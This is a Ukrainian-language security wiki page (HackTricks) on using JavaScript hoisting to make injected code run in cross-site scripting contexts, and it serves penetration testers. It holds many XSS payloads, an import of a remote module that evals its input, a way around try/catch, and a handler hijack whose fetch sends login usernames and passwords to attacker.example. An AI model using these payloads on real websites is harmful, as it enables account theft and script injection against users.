JS Hoisting

Tip

Вивчайте та практикуйте AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Вивчайте та практикуйте GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Вивчайте та практикуйте Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Підтримайте HackTricks

Основна інформація

У мові JavaScript існує механізм, відомий як Hoisting, коли оголошення змінних, функцій, класів або імпортів концептуально піднімаються на початок їхньої області видимості перед виконанням коду. Цей процес автоматично виконується JavaScript-рушієм, який проходить скрипт кількома проходами.

Під час першого проходу рушій парсить код, перевіряє на наявність синтаксичних помилок і перетворює його в abstract syntax tree. Ця фаза включає hoisting — процес, коли певні оголошення переміщуються на верх контексту виконання. Якщо фаза парсингу успішна (немає синтаксичних помилок), виконання скрипта продовжується.

Важливо розуміти, що:

  1. Скрипт має бути вільним від синтаксичних помилок, щоб виконання відбулося. Правила синтаксису потрібно суворо дотримуватися.
  2. Розташування коду в межах скрипта впливає на виконання через hoisting, хоча виконуваний код може відрізнятися від його текстового представлення.

Типи Hoisting

На основі інформації з MDN, у JavaScript є чотири різні типи hoisting:

  1. Value Hoisting: Дозволяє використовувати значення змінної в межах її області видимості до рядка її оголошення.
  2. Declaration Hoisting: Дозволяє посилатися на змінну в межах її області видимості до її оголошення без виникнення ReferenceError, проте значення змінної буде undefined.
  3. Цей тип змінює поведінку в межах області видимості через те, що оголошення змінної відбувається до її фактичної позиції в коді.
  4. Побічні ефекти оголошення відбуваються до того, як буде оцінено решту коду, що його містить.

Детально: оголошення функцій проявляють поведінку типу 1 hoisting. Ключове слово var демонструє поведінку типу 2. Лексичні оголошення, які включають let, const та class, показують поведінку типу 3. Нарешті, import-заяви унікальні тим, що вони піднімаються з поведінкою і типу 1, і типу 4.

Сценарії

Отже, якщо у вас є сценарії, де ви можете Inject JS code after an undeclared object is used, ви можете fix the syntax шляхом оголошення його (щоб ваш код виконався замість того, щоб викликати помилку):

// The function vulnerableFunction is not defined
vulnerableFunction('test', '<INJECTION>');
// You can define it in your injection to execute JS
//Payload1: param='-alert(1)-'')%3b+function+vulnerableFunction(a,b){return+1}%3b
'-alert(1)-''); function vulnerableFunction(a,b){return 1};

//Payload2: param=test')%3bfunction+vulnerableFunction(a,b){return+1}%3balert(1)
test'); function vulnerableFunction(a,b){ return 1 };alert(1)

// If a variable is not defined, you could define it in the injection
// In the following example var a is not defined
function myFunction(a,b){
return 1
};
myFunction(a, '<INJECTION>')

//Payload: param=test')%3b+var+a+%3d+1%3b+alert(1)%3b
test'); var a = 1; alert(1);

// If an undeclared class is used, you cannot declare it AFTER being used
var variable = new unexploitableClass();
<INJECTION>
// But you can actually declare it as a function, being able to fix the syntax with something like:
function unexploitableClass() {
return 1;
}
alert(1);

// Properties are not hoisted
// So the following examples where the 'cookie' attribute doesn´t exist
// cannot be fixed if you can only inject after that code:
test.cookie("leo", "INJECTION")
test[("cookie", "injection")]

Більше сценаріїв

// Undeclared var accessing to an undeclared method
x.y(1,INJECTION)
// You can inject
alert(1));function x(){}//
// And execute the allert with (the alert is resolved before it's detected that the "y" is undefined
x.y(1,alert(1));function x(){}//)

// Undeclared var accessing 2 nested undeclared method
x.y.z(1,INJECTION)
// You can inject
");import {x} from "https://example.com/module.js"//
// It will be executed
x.y.z("alert(1)");import {x} from "https://example.com/module.js"//")


// The imported module:
// module.js
var x = {
y: {
z: function(param) {
eval(param);
}
}
};

export { x };

// In this final scenario from https://joaxcar.com/blog/2023/12/13/having-some-fun-with-javascript-hoisting/
// It was injected the: let config;`-alert(1)`//`
// With the goal of making in the block the var config be empty, so the return is not executed
// And the same injection was replicated in the body URL to execute an alert

try {
if (config) {
return
}
// TODO handle missing config for: https://try-to-catch.glitch.me/"+`
let config
;`-alert(1)` //`+"
} catch {
fetch("/error", {
method: "POST",
body: {
url:
"https://try-to-catch.glitch.me/" +
`
let config;` -
alert(1) -
`//` +
"",
},
})
}
trigger()

Hoisting для обходу обробки винятків

Коли sink обгорнутий у try { x.y(...) } catch { ... }, ReferenceError зупинить виконання до того, як ваш payload виконається. Ви можете попередньо оголосити відсутній ідентифікатор, щоб виклик пройшов і ваш вставлений вираз виконався першим:

// Original sink (x and y are undefined, but you control INJECT)
x.y(1,INJECT)

// Payload (ch4n3 2023) – hoist x so the call is parsed; use the first argument position for code exec
prompt()) ; function x(){} //

function x(){} is hoisted before evaluation, so the parser no longer throws on x.y(...); prompt() executes before y is resolved, then a TypeError is thrown after your code has run.

Запобігайте пізнішим деклараціям, заблокувавши ім’я за допомогою const

Якщо ви можете виконатися до того, як на верхньому рівні function foo(){...} буде розпарсено, оголошення лексичної прив’язки з тим же ім’ям (наприклад, const foo = ...) запобігатиме тому, щоб пізніше оголошення функції повторно прив’язало цей ідентифікатор. Це можна зловживати в RXSS для перехоплення критичних обробників, визначених пізніше на сторінці:

// Malicious code runs first (e.g., earlier inline <script>)
const DoLogin = () => {
const pwd  = Trim(FormInput.InputPassword.value)
const user = Trim(FormInput.InputUtente.value)
fetch('https://attacker.example/?u='+encodeURIComponent(user)+'&p='+encodeURIComponent(pwd))
}

// Later, the legitimate page tries to declare:
function DoLogin(){ /* ... */ } // cannot override the existing const binding

Notes

  • Це покладається на порядок виконання та глобальну (верхньорівневу) область видимості.
  • Якщо ваш payload виконується всередині eval(), пам’ятайте, що const/let всередині eval мають блочну область видимості і не створюють глобальних зв’язувань. Інжектуйте новий елемент <script> з кодом, щоб встановити справжній глобальний const.

Dynamic import() with user-controlled specifiers

Додатки зі серверним рендерингом іноді передають ввід користувача у import() для відкладеного завантаження компонентів. Якщо присутній loader, такий як import-in-the-middle, з цього специфікатора генеруються wrapper modules. Через hoisting, оцінка import завантажує й виконує модуль, контрольований атакуючим, до виконання наступних рядків, що дозволяє RCE в SSR-контекстах (див. CVE-2023-38704).

Tooling

Сучасні сканери почали додавати явні hoisting payloads. KNOXSS v3.6.5 перелічує “JS Injection with Single Quotes Fixing ReferenceError - Object Hoisting” та “Hoisting Override” тест-кейси; запуск цього інструмента проти RXSS-контекстів, які кидають ReferenceError/TypeError, швидко виявляє кандидатів на hoist-based gadget.

References

Tip

Вивчайте та практикуйте AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Вивчайте та практикуйте GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Вивчайте та практикуйте Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Підтримайте HackTricks